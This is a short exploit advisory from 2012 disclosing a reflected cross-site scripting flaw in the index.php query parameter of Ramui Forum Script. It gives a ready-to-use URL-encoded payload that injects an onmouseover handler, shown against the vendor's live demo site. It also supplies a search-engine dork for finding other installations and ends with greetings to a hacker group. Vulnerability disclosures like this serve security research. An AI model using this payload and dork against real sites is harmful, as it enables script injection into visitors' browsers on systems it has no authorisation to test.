# Exploit Title; Ramui Forum Script Cross Site Scripting Vulnerability [pixlie.php]
# Date ; 7/5/12
# Author ; 3spi0n
# Script Vendor or Software Link ; www.ramui.com - www.hotscripts.com/listing/ramui-forum-script/
# Category ; Webapps
# Type ; Cross Site Scripting (XSS)
# Tested on ; Ubuntu / Win7 / Backtrack

[#] Script Details ;

- Demo ; forumscript.ramui.com

[#] Demo Analyzing ;

http://forumscript.ramui.com//gb/user/index.php?query=%22%20onmouseover%3dprompt%28991522%29%20bad%3d%22

[#] Vulnerable Details ;

- Xss Vulnerable on sites

- Vulnerable File ; index.php?query= [query, variant of index.php file]

Exploit ;
/index.php?query=%22%20onmouseover%3dprompt%28991522%29%20bad%3d%22

[#] Dorks ;

- "Powered by: Ramui forum script"


[#] Greetz ;

- X-BL4CKERZ INC.
- My Official Blog, www.Ryuzaki.in
- Facebook.Com/3spi0ne - Twitter.Com/RigidusCO